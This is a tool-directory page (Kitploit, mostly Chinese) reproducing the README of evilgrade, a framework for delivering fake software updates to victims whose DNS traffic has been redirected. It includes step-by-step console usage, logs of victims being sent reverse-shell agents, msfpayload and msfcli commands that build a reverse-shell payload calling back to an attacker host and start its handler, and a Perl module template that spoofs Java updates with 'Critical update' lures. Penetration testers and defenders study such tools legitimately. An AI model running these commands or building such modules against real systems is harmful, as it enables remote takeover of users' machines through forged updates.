Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
evilgrade — Evilgrade 是一个模块化框架,允许用户通过注入虚假更新来利用薄弱的升级实现。 | Kitploit
工具/GitHubGitHub/infobyte/evilgrade
漏洞利用框架Payload生成Web代理与拦截渗透测试社会工程学红队DNS 分析
GitHubinfobyte/evilgrade

evilgrade

Evilgrade 是一个模块化框架,允许用户通过注入虚假更新来利用薄弱的升级实现。

查看仓库
1.3k276265年前Kitploit 审核通过
网站

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Faraday Security Research -- | ISR-evilgrade | www.faradaysec.com | --

.:: [简要概述] ::.

Evilgrade 是一个模块化框架,允许用户利用糟糕的升级实现,通过注入虚假更新来获利。 它附带预构建的二进制文件(代理)、用于快速渗透测试的默认配置,并拥有自己的 WebServer 和 DNSServer 模块。 易于设置新配置,并且在设置新二进制代理时具有自动配置功能。

* 什么时候应该使用 evilgrade?

当攻击者能够进行主机名重定向(操纵受害者的 DNS 流量)时,该框架即可发挥作用,这种情况可在以下两种场景中实现:

内部场景:
  • 内部 DNS 访问
  • ARP 欺骗
  • DNS 缓存投毒
  • DHCP 欺骗
  • TCP 劫持
  • Wi-Fi 接入点冒充
外部场景:
  • 内部 DNS 访问
  • DNS 缓存投毒
* 它是如何工作的?

Evilgrade 通过模块运行,每个模块中都有一个实现的结构,用于模拟特定应用程序/系统的虚假更新。

* 支持哪些操作系统?

ISR-Evilgrade 是跨平台的,只取决于为要利用的目标平台选择合适的载荷。

已实现的模块:


  • Freerip 3.30
  • Jet photo 4.7.2
  • Teamviewer 5.1.9385
  • ISOpen 4.5.0
  • Istat.
  • Gom 2.1.25.5015
  • Atube catcher 1.0.300
  • Vidbox 7.5
  • Ccleaner 2.30.1130
  • Fcleaner 1.2.9.409
  • Allmynotes 1.26
  • Notepad++ 5.8.2
  • Java 1.6.0_22 winxp/win7
  • aMSN 0.98.3
  • Appleupdate <= 2.1.1.116 ( Safari 5.0.2 7533.18.5, <= Itunes 10.0.1.22, <= Quicktime 7.6.8 1675)
  • Mirc 7.14
  • Windows update (ie6 lastversion, ie7 7.0.5730.13, ie8 8.0.60001.18702, Microsoft works)
  • Dap 9.5.0.3
  • Winscp 4.2.9
  • AutoIt Script 3.3.6.1
  • Clamwin 0.96.0.1
  • AppTapp Installer 3.11 (Iphone/Itunes)
  • getjar (facebook.com)
  • Google Analytics Javascript injection
  • Speedbit Optimizer 3.0 / Video Acceleration 2.2.1.8
  • Winamp 5.581
  • TechTracker (cnet) 1.3.1 (Build 55)
  • Nokiasoftware firmware update 2.4.8es - (Windows software)
  • Nokia firmware v20.2.011
  • BSplayer 2.53.1034
  • Apt ( < Ubuntu 10.04 LTS)
  • Ubertwitter 4.6 (0.971)
  • Blackberry Facebook 1.7.0.22 | Twitter 1.0.0.45
  • Cpan 1.9402
  • VirtualBox (3.2.8)
  • Express talk
  • Filezilla
  • Flashget
  • Miranda
  • Orbit
  • Photoscape.
  • Panda Antirootkit
  • Skype
  • Sunbelt
  • Superantispyware
  • Trillian <= 5.0.0.26
  • Adium 1.3.10 (Sparkle Framework)
  • VMware
  • 更多...
    • /docs/CHANGES

    .:: [主要用法] ::.

    其用法类似于 IOS 控制台。``` evilgrade>help Type 'help command' for more detailed help on a command. Commands: configure - Configure - no help available exit - exits the program help - prints this screen, or help on 'command' reload - Reload to update all the modules - no help available restart - Restart webserver - no help available set - Configure variables - no help available show - Display information of . start - Start webserver - no help available status - Get webserver status - no help available stop - Stop webserver - no help available version - Display framework version. - no help available

    Object: options - Show options of current module. vhosts - Show VirtualHosts of current module. modules - List all modules available for use. active - Show active modules.

    root@kitploit:~
    ## 已实现的模块列表``` console
    evilgrade>show modules
    
    List of modules:
    ===============
    
    ...
    ...
    ...
    
    - 63 modules available.
    

    配置指定模块``` console

    evilgrade>conf sunjava evilgrade(sunjava)>

    root@kitploit:~
    #### 显示所有虚拟主机。
    #### VirtualHost 字段包含我们的 Web 服务器将要为我们模拟的域名。``` console
    evilgrade>show vhosts
    
    Virtual hosts:
    =============
    
    [
      "java.sun.com",
      "javadl-esd.sun.com",
      ...
      ...
      ...
    ]
    

    显示当前模块的选项。

    agent: 这是我们的假更新二进制文件,我们必须设置其路径,或者实现动态假更新二进制文件生成(参见 ADVANCED)。``` console

    evilgrade(sunjava)>show options

    Display options:

    Name = Sun Microsystems Java Version = 2.0 Author = ["Francisco Amato < famato +[AT]+ faradaysec.com>"] Description = "" VirtualHost = "java.sun.com|javadl-esd.sun.com"

    .-------------------------------------------------------------------------------------------------------------------------. | Name | Default | Description | +--------------+-------------------------------------------------+--------------------------------------------------------+ | website | http://java.com/moreinfolink | Website displayed in the update | | enable | 1 | Status | | atitle | Critical vulnerability | Title name to be displayed in the systray item popup | | arg | | Arg passed to Agent | | adescription | This critical update fix internal vulnerability | Description to be displayed in the systray item popup | | description | This critical update fix internal vulnerability | Description to be displayed during the update | | agent | ./agent/reverseshellsign.exe | Agent to inject | | title | Critical update | Title name displayed in the update | '--------------+-------------------------------------------------+--------------------------------------------------------'

    root@kitploit:~
    #### 启动服务(DNS Server 和 WebServer)``` console
    evilgrade>start
    evilgrade>
    [28/10/2010:21:35:55] - [WEBSERVER] - Webserver ready. Waiting for connections ...
    evilgrade>
    [28/10/2010:21:35:55] - [DNSSERVER] - DNS Server Ready. Waiting for Connections ...
    
    #### Waiting for victims
    
    evilgrade>
    [25/7/2008:4:58:25] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: "^/update/[.\\d]+/map\\-[.\\d]+.xml"
    evilgrade>
    [25/7/2008:4:58:26] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: "^/java_update.xml\$"
    evilgrade>
    [25/7/2008:4:58:39] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: ".exe"
    evilgrade>
    [25/7/2008:4:58:40] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Agent sent: "./agent/reverseshell.exe"
    

    显示状态和受害者日志``` console

    evilgrade>show status Webserver (pid 4134) already running

    Users status:

    .---------------------------------------------------------------------------------------------------------------. | Client | Module | Status | Md5,Cmd,File | +----------------+------------------+--------+------------------------------------------------------------------+ | 192.168.233.10 | modules::sunjava | send | d9a28baa883ecf51e41fc626e1d4eed5,'',"./agent/reverseshell.exe" | '----------------+------------------+--------+------------------------------------------------------------------'

    root@kitploit:~
    ## .:: [深度使用] ::.
    
    ### 命令
    #### configure / conf - 配置 <module-name>
    
    示例:
    -------``` console
    evilgrade>configure sunjava
    evilgrade(sunjava)>
    
    evilgrade>conf sunjava
    evilgrade(sunjava)>
    
    ## 'conf' takes us back to the global configuration
    evilgrade(sunjava)>conf
    evilgrade>
    
    
    ##
    reload    - Reload to get all modules update (to refresh loaded modules, useful on development)
    start     - Start webserver
    stop      - Stop webserver (fake update server)
    

    示例: -------``` console evilgrade>start evilgrade> [28/10/2010:21:35:55] - [WEBSERVER] - Webserver ready. Waiting for connections ... evilgrade> [28/10/2010:21:35:55] - [DNSSERVER] - DNS Server Ready. Waiting for Connections ...

    #######################################

    Example:

    evilgrade>stop Stopping WEBSERVER [OK] Stopping DNSSERVER [OK]

    #######################################

    restart - Restart services (WebServer and DNS Server) stops and starts again

    #######################################

    status - Get webserver and victims status

    Example:

    evilgrade>show status Webserver (pid 4134) already running

    Users status:

    .---------------------------------------------------------------------------------------------------------------. | Client | Module | Status | Md5,Cmd,File | +----------------+------------------+--------+------------------------------------------------------------------+ | 192.168.233.10 | modules::sunjava | send | d9a28baa883ecf51e41fc626e1d4eed5,'',"./agent/reverseshell.exe" | '----------------+------------------+--------+------------------------------------------------------------------'

    #######################################

    show - Display information of .

    #######################################

    show active - Display active modules in the webserver

    #######################################

    show modules - Display implemented modules

    #########################################

    show options - Display modules/global options

    Example:

    evilgrade>show options

    Display options:

    .-----------------------------------------------------------------------------------. | Name | Default | Description | +-------------+-----------+---------------------------------------------------------+ | DNSEnable | 1 | Enable DNS Server ( handle virtual request on modules ) | | DNSAnswerIp | 127.0.0.1 | Resolve VHost to ip ) | | DNSPort | 53 | Listen Name Server port | | debug | 1 | Debug mode | | port | 80 | Webserver listening port | | sslport | 443 | Webserver SSL listening port | '-------------+-----------+---------------------------------------------------------'

    evilgrade> evilgrade(notepadplus)>conf vmware evilgrade(vmware)>show options (without started services)

    Display options:

    Name = VMware Server Version = 1.0 Author = ["Francisco Amato < famato +[AT]+ faradaysec.com>"] Description = "" VirtualHost = "www.vmware.com"

    .----------------------------------------------. | Name | Default | Description | +--------+-------------------+-----------------+ | enable | 1 | Status | | agent | ./agent/agent.exe | Agent to inject | '--------+-------------------+-----------------'

    evilgrade(vmware)>show options (with started services after setting agent)

    Display options:

    Name = VMware Server Version = 1.0 Author = ["Francisco Amato < famato +[AT]+ faradaysec.com>"] Description = "" VirtualHost = ""

    下载工具
    www.vmware.com

    .--------------------------------------------------------------------------------------------------. | Name | Default | Description | +-------------+------------------------------------------------------------------+-----------------+ | enable | 1 | Status | | agentmd5 | f80af637642170507bda998b6f2015fa | | | agentsize | 54576 | | | agent | ./agent/agent.exe | Agent to inject | | agentsha256 | 44f4e3f65f6ca375df4e0247fa0ee1efedbe2965a1c35e910d8d035ec61b76bd | | '-------------+------------------------------------------------------------------+-----------------'

    #########################################

    set - Configure variables global or modules

    Example:

    evilgrade>show options

    Display options:

    .-----------------------------------------------------------------------------------. | Name | Default | Description | +-------------+-----------+---------------------------------------------------------+ | DNSEnable | 1 | Enable DNS Server ( handle virtual request on modules ) | | DNSAnswerIp | 127.0.0.1 | Resolve VHost to ip ) | | DNSPort | 53 | Listen Name Server port | | debug | 0 | Debug mode | | port | 80 | Webserver listening port | | sslport | 443 | Webserver SSL listening port | '-------------+-----------+---------------------------------------------------------'

    ###Let's enable DEBUG option and set as DNSAnswerIp our Inet address (192.168.1.4)

    evilgrade>set debug 1 #Enable debug set debug, 1

    evilgrade>set DNSAnswerIp 192.168.1.4 #Ip where evilgrade's DNS Server is listening set DNSAnswerIp, 192.168.1.4

    evilgrade>show options

    Display options:

    .-------------------------------------------------------------------------------------. | Name | Default | Description | +-------------+-------------+---------------------------------------------------------+ | DNSEnable | 1 | Enable DNS Server ( handle virtual request on modules ) | | DNSAnswerIp | 192.168.1.4 | Resolve VHost to ip ) | | DNSPort | 53 | Listen Name Server port | | debug | 1 | Debug mode | | port | 80 | Webserver listening port | | sslport | 443 | Webserver SSL listening port | '-------------+-------------+---------------------------------------------------------'

    ###############################

    exit - exits the program

    #######################################

    help - prints this screen, or help on 'command'

    #######################################

    root@kitploit:~
    ## .:: [高级] ::.
    
    - 模块选项:
    每个模块都有特殊的选项,但 "agent" 字段始终存在。
    agent 是我们的虚假更新二进制文件,我们必须设置其所在路径,或实现动态虚假更新二进制文件生成。
    
    [动态虚假更新二进制文件] 允许执行外部命令来生成我们的二进制文件,例如使用 metasploit 框架的 msfpayload。
    利用此功能,我们可以生成 metasploit 的任何 payload,或使用外部接口创建二进制文件。
    
    # 示例 1:```
    evilgrade(sunjava)>set agent '["/metasploit/msfpayload windows/shell_reverse_tcp LHOST=192.168.233.2 LPORT=4141 X > <%OUT%>/tmp/a.exe<%OUT%>"]'
    

    在这种情况下,对于每个所需的更新二进制文件,我们生成一个带有有效载荷 "windows/shell_reverse_tcp" 的虚假更新二进制文件,使用反向 shell 连接到地址 192.168.233.2 端口 4141。 标签 <%OUT%><%OUT> 是一个特殊标签,用于检测输出二进制文件将被生成的位置。 Evilgrade 检测到使用了"动态虚假更新二进制文件特性",因为方括号 '[]' 之间有一个句子。 在该括号内,我们有一个也用双括号 "" 括起来的字符串,该字符串由 Perl 编译。

    例如,如果我们使用:``` evilgrade(sunjava)>set agent '["./generatebin -o <%OUT%>/tmp/update".int(rand(256)).".exe<%OUT%>"]'

    root@kitploit:~
    然后,每次我们收到一个二进制请求时,evilgrade将编译该行并执行最终字符串 "./generatebin -o /tmp/update(random).exe"
    生成不同的代理。
    
    
    一种简单但不动态的替代方法,可以直接在终端上用msfpayload生成有效载荷,然后手动将其分配给模块的配置。
    
    # 示例2:
    
    (在evilgrade外部)```
    [team@faraday]$ msfpayload windows/meterpreter/reverse_ord_tcp LHOST=192.168.100.2 LPORT=4444 X > /tmp/reverse-shell.exe
    

    (在 evilgrade 内部)``` evilgrade(sunjava)>set agent /tmp/reverse-shell.exe

    root@kitploit:~
    在生成载荷后,我们在先前分配的LHOST上留一个多处理器监听。
    
    (在evilgrade外部)```
    [team@faraday]$ msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.100.2 LPORT=4444 E
    [*] Started reverse handler on 192.168.100.2:4444
    [*] Starting the payload handler...
    

    .:: [模块开发] ::.

    模块开发非常简单。由于evilgrade基于模块,你只需使用一个.pm包(Perl模块)。 在这个例子中,我们将描述sunjava更新模块(注释以#开头):``` perl package modules::sunjava;

    use strict; use Data::Dump qw(dump);

    my $base= { 'name' => 'Sun Microsystems Java', #name of the module to display in the framework 'version' => '2.0', #internal module version 'appver' => '<= 1.6.0_22', #last application version tested with this evilgrade module 'author' => [ 'Francisco Amato < famato +[AT]+ faradaysec.com>' ], #author 'description' => qq{}, #brief description 'vh' => '(java.sun.com|javadl-esd.sun.com)', #VirtualHosts that the application uses to retrieve information about the update configuration files and update binaries.

    root@kitploit:~
    #Then we have the request object's collection
    'request' => [
    #Each object it's a possible HTTP request inside the virtualhost configured for the module (java.sun.com)
        {
        'req' => '(/update/[.\d]+/map\-[.\d]+.xml|/update/1.6.0/map\-m\-1.6.0.xml)', #The required URL, regex friendly
        'type' => 'file', #it's the response type (file|string|agent|install)
         #we can use:
                      #file: response with content file referenced in the "file" option below (./include/sunjava_map.xml)
                      #string: response with a string referenced in the "string" options below
                      #agent:  response with content file referenced in the "agent" options (options section)
                      #install: response with content file referenced in the "file" option below
                        #It's used to know if the fake update was executed
                        #In some update process we can specify a final page after update installed
                        #so we send to a controller page.
        'method' => '', #not implemented yet
        'bin'    => '', #set to 1 if we are going to send a binary file
        'string' => '', #if we have chosen the 'type' string then in this variable we set the response
        'parse' => '', #set to 1 if the file or string need be parsed with options
        'file' => './include/sunjava/sunjava_map.xml'
        },
    
        {
        'req' => '^/java_update.xml$', #regex friendly
        'type' => 'file', #file|string|agent|install
        'method' => '', #any
        'bin'    => '',
        'string' => '',
        'parse' => '1',
        'file' => './include/sunjava/sunjava_update.xml'
        },
        {
        'req' => '/x.jnlp', #regex friendly
        'type' => 'file', #file|string|agent|install
        'method' => '', #any
        'bin'    => '',
        'string' => '',
        #In this case we parse the file
                    'parse' => '1',
        #To parse the file we use special tags, like <%OPTIONAME%> inside the "file" or "string" field
              #This tags are replaced with the values of the options, for example
              #<%TITLE%> will be replaced by 'Critical update'
        'file' => './include/sunjava/x.jnlp'
        },
        {
        'req' => '.jar', #regex friendly
        'type' => 'file', #file|string|agent|install
        'method' => '', #any
        'bin'    => 1,
        'string' => '',
        'parse' => '',
        'file' => './include/sunjava/JavaPayload/FunnyClass2.jar'
        },
    
        {
        'req' => '.exe', #regex friendly
        'type' => 'agent', #Here we have an agent type with a binary response
        'bin'    => 1,
        'method' => '', #any
        'string' => '',
        'parse' => '',
        'file' => ''
        }
    ],
    
    #Options
    #Here we have the options that will be displayed with "show options" inside the current module.
    #This options are used to parse the string or a file using in the responses
    'options' => {  'agent'  => { 'val' => './agent/java/javaws.exe', #The default value
              'desc' => 'Agent to inject'}, #Brief description
        'arg'    => { 'val' => 'http://java.sun.com/x.jnlp"',
              'desc' => 'Arg passed to Agent'},
        'enable' => { 'val' => 1,
              'desc' => 'Status'},
    
    #The following is a dynamic hidden option,
    #In this case we use the tag <%NAME%> to parse the files and execute perl functions to get randoms values
    #You can use whatever you like in perl, if you're wishing to use more functions check "isrcore/utils.pm"
                    'name'  => { 'val' => "'javaupdate'.isrcore::utils::RndAlpha(isrcore::utils::RndNum(1))",
                                'hidden' => 1,
                          'dynamic' =>1,},
    
    #All the options depend on the update process. You have to research the possible variables and implement them on your module
    #These are the mostly common update messages, webpages, descriptions, popup messages, title, etc
        'title'  => { 'val' => 'Critical update',
              'desc' => 'Title name displayed in the update'},
        'description' => { 'val' => 'This critical update fix internal vulnerability',
          'desc' => 'Description to be displayed during the update'},
        'atitle'  => { 'val' => 'Critical vulnerability',
               'desc' => 'Title name to be displayed in the systray item popup'},
        'adescription' => { 'val' => 'This critical update fix internal vulnerability',
          'desc' => 'Description  to be displayed in the systray item popup'},
        'website' => { 'val' => 'http://java.com/moreinfolink',
               'desc' => 'Website displayed in the update'}
     }
    

    };

    root@kitploit:~
    ## .:: [提示] ::.
    
    1) 别忘了使用具有监听套接字创建权限的用户运行 evilgrade,否则你将无法使用 evilgrade 的服务。
    
    2) 每次在 evilgrade 运行时修改模块后,别忘了执行 'reload' 操作。
    
    3) 在启动服务之前设置二进制 'agents',因为 evilgrade 会为你自动填写一些字段(agentmd5、agentsha256 和 agentsize),这些字段在服务运行后无法完成。
    
    4) 如果你使用含变量的动态响应,例如:<%AGENTSIZE%>、<%AGENTMD5%>、<%URL\_FILE%>、<%URL\_FILE\_EXT%>,或在选项部分自定义的其他变量,别忘了将 *parse* 设置为 1。
    
    5) 注入 agent 时同理,必须将 *bin* 标志设置为 1。
    
    6) 如果你想通过 HTTP 发送纯文本响应,请使用 *cheader* 标志。示例如下:```
            {   'req' => '/sitepath/download/file.zip'
                ,    #regex friendly
                'type'    => 'string',                  #file|string|agent|install
                'method'  => '',                        #any
                'bin'     => '',
                'string'  => '',
                'parse'   => '1',
                'file'    => '',
                'cheader' => "HTTP/1.1 302 Found\r\n"
                    . "Location: http://sitedomain.com/<%URL_FILE%>.exe \r\n"
                    . "Content-Length: 0 \r\n"
                    . "Connection: close \r\n\r\n",
            },
    
    7) To filter via User-Agent, use as an example the Sparkle2 module. In base add  'useragent' => 'true', and on a request use as you would use the 'req' field but for user agents in 'useragent'. Note that this field already stripped "User-Agent: ".
    

    .:: [要求] ::.

    Perl 模块```

    root@kitploit:~
    Data::Dump
    Digest::MD5
    Time::HiRes
    RPC::XML
    
    root@kitploit:~
    ## .:: [更多信息] ::.
    
    该框架曾在以下安全会议上展示:```
    · ekoparty 2007 [Buenos Aires, Argentina] [www.ekoparty.org]
    · Troopers 2008 [Munich, Germany] [www.troopers08.org]
    · Shakacon 2008 [Hawaii, USA] [www.shakacon.org]
    · H2HC 2009 [Brazil] [www.h2hc.com.br]
    · Blackhat Arsenal & Defcon 2010 [Las Vegas, USA] [www.blackhat.com www.defcon.org]
    

    .:: [作者] ::.

    Francisco Amato famato+at+faradaysec+dot+com